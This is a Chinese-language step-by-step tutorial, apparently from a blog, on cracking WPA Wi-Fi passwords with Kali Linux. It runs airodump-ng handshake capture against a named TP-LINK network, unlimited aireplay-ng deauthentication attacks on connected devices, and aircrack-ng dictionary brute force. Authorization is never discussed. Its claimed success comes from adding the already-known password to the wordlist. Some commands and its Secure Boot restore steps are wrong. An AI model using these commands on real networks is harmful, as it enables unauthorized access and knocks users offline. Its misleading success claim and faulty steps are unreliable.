環境準備:
方式一(選擇該方式):Kali Linux、筆記本一臺、U盤(至少8G)
方式二:Kali Linux、外接網路卡、筆記本一臺、VM
特別說明,主要是使用方式一進行破解,如果有外接網路卡,那就非常簡單了,直接通過vm外接網路卡即可。
注:製作kali啟動映象前,U盤裡的資料一定要備份、備份、備份。
1.balenaEtcher安裝
該軟體是用來製作映象的工具,也可以使用其它的。不過不推薦,試過其它幾款,還不如這個一鍵製作好用。
2.製作kali啟動映象
等待3-5分鐘.注:在製作過程中,會彈出'初始化'的視窗,取消或者關閉就行,不要點選格式化,否則會讓製作的映象白費,需要重新來一次。
完成。
3.開機啟動設定
(1).進入bios介面
自己的電腦型號對應不同按鍵的啟動bios方式不同,常用的筆記本型號的進入bios方式。如下圖所示,其它型號的可自行百度往下看。(如,百度搜尋'華碩筆記本進入bios按鍵')。
(2).設定啟動項的順序
設定U盤啟動項的順序可自行百度,比較簡單,這裡不再敘述。
如果出現'Secure Boot Violation'等資訊,那麼我們就需要關閉筆記本的保護模式。方法大同小異,這是介面外觀可能不一樣,內容是一樣的。當完成實驗後,要把系統保護改回來。
[1].傳統方式具體操作步驟往下看:
①.進入Bios設定頁面
②.security頁面
進入[Security]頁面(1),選擇[Secure Boot](2)專案
③.安全啟動功能關閉
選擇[Secure Boot Control]專案(3),並設定為[Disabled](4)。部分機種可能只有[Secure Boot]而沒有[Secure Boot Control],則請選擇[Secure Boot]並設定為[Disable]。
④. 儲存設定並退出
進入[Save & Exit]頁面(5),選擇[Save Changes and Exit](6)後並選擇[Yes](7)。
[2].UEFI方式具體操作步驟往下看:
①.進入BIOS設定頁面後,使用快捷鍵[F7]、或是滑鼠點選(1)進入進階模式。
②.進入[Security]頁面,選擇[Secure Boot]專案。
③.安全啟動功能關閉
選擇[Secure Boot Control]專案(4),並設定為[Disabled](5)。部分機種可能只有[Secure Boot]而沒有[Secure Boot Control],則請選擇[Secure Boot]並設定為[Disable]。
④.儲存設定並退出
進入[Save & Exit]頁面(6),選擇[Save Changes and Exit](7)後並選擇[Yes](8)。或者按F10儲存
4.啟動kali
注意:這一步一定不能馬虎,一定要快速選擇'kali live'模式,一定不能選擇'install kali',也不能長時間不動,否則就等著重灌系統、資料不見等一系列的問題。
5.無線wifi破解實驗
(1).ifconfig
命令ifconfig檢視網路卡資訊,有wlan0表示網路卡能夠用來破解wifi。
root@kali:~# ifconfig |
(2).airmon-ng
使用命令airmon-ng start wlan0開啟網路卡監聽模式。
root@kali:~# airmon-ng start wlan0 |
(3).iwconfig
使用iwconfig命令檢視網路卡資訊, wlan0mon網路卡名加了mon則表示'監聽模式'開啟成功。
root@kali:~# iwconfig |
(4).airodump-ng掃描
使用命令airodump-ng wlan0mon,開始掃描WiFi,按ctrl+c結束任務。
root@kali:~# airodump-ng wlan0mon |
引數 |
意義 |
BSSID |
wifi的MAC地址 |
PWR |
訊號強弱程度,數值越小訊號越強 |
DATA |
資料量,越大使用的人就越多 |
CH |
通道頻率(頻道) |
ESSID |
wifi的名稱,中文可能會有亂碼 |
(5).抓包
接著輸入airodump-ng --bssid BSSID -c 通道頻率 -w 抓包儲存的路徑 wlan0mon。注,--bssid後面跟著的是'BSSID(MAC地址)',-c後面跟著的是'CH(通道)',-w後面跟著抓到的包儲存到哪,最後是網路卡資訊'wlan0mon'。
如:我想要破解ESSID為TP-LINK_961A4A的無線wifi,格式為:
root@kali:~# airodump-ng --bssid 38:83:45:96:1A:4A -c -w /opt/catchWiFi wlan0mon |
資料包已經正在抓取,等待一會,如果抓取不到資料.接著往下看
另起終端,輸入格式為'airepaly-ng -0 0 -c STATION(任選其一) -a bssid 網路卡名(一般為wlan0mon)'。不過STATION最好選擇手機的熱點,如果不清楚手機的mac地址那麼可以任選其一,選擇手機的好處是可以手動設定斷線,讓其抓取到包。如果運氣不好,那麼就試四個把。
如:我想要攻擊STATION(MAC地址)為,格式為:
root@kali:~# aireplay-ng -0 0 -c 38:83:45:96:1A:4A -a 14:95:CE:BB:53:A8 wlan0mon |
每個引數的意義
(0 WiFi裝置無限次數,-0 8則攻擊8次。攻擊原理是:先讓裝置掉線,裝置會再自動連線,併發這個自動連線過程會進行三次握手,會傳送tcp包(裡面包含加密的密碼資料),我方偽裝成WiFi熱點去竊取該資料包。我方竊取後即可用字典窮舉法暴力破解加密的WiFi密碼, 資料包裡面的密碼是雜湊加密的,雜湊加密只能正向) |
當'airodump-ng --bssid BSSID'視窗出現WPA handshake時,表示抓包成功。這裡有一個小技巧讓其抓到包,讓手機連線的wifi斷開,然後重新連線wifi。簡單說,把手機WiFi重新關開即可。
出現'WPA handshake時'時,需要讓兩個終端都按Ctrl+c停止,不然會一直斷網的。
檢視抓到的資料包.cd開啟抓包的目錄,ls列出來,就看到我們抓到的資料包
(6).解壓kali字典檔案
解壓kali自帶的字典檔案.路徑:/usr/share/wordlists/rockyou.txt.gz
root@kali:~# gzip -d/usr/share/wordlists/rockyou.txt.gz |
(7).跑包(破解密碼)
格式:aircrack-ng -w 字典路徑 握手包路徑,回車後開始爆破。
運氣有一些差,抓到了三個cap包,一個沒跑成功。但是怎麼能放棄,毛主席說過,沒有條件創造條件。如果抱著一定要跑出來的決心,就接著往下看。
root@kali:~# aircrack-ng -w /usr/share/wordlists/rockyou.txt /opt/catchWifi-01.cap root@kali:~# aircrack-ng -w /usr/share/wordlists/rockyou.txt /opt/catchWifi-02.cap root@kali:~# aircrack-ng -w /usr/share/wordlists/rockyou.txt /opt/catchWifi-03.cap |
方法,就是把我們正確的wifi密碼加入到'密碼字典(rockyou.txt)'中去。然後重新來一次,跑包。成功了。。。。。。。
#新增'root123..'到rockyou密碼字典中 root@kali:~# vim /usr/share/wordlists/rockyou.txt root123.. |
特別說明:暴力破解並不簡單,需要足夠強大的字典和時間,可以通過字典生成工具生成自己的字典,字典越強大越容易破解。
其它密碼字典:連結:https://pan.baidu.com/s/1dL_AqQ4nBb5eBJHA47Eq1g 提取碼:23fp
6.恢復保護系統
[1].傳統方式'安全啟動功能開啟'具體操作步驟往下看:
選擇[Secure Boot Control]專案(3),並設定為[Disabled](4)。部分機種可能只有[Secure Boot]而沒有[Secure Boot Control],則請選擇[Secure Boot]並設定為[Enabled]。
[2].UEFI方式'安全啟動功能開啟'具體操作步驟往下看:
選擇[Secure Boot Control]專案(4),並設定為[Disabled](5)。部分機種可能只有[Secure Boot]而沒有[Secure Boot Control],則請選擇[Secure Boot]並設定為[Enabled]。看右手有儲存的提示,華碩的是F10儲存。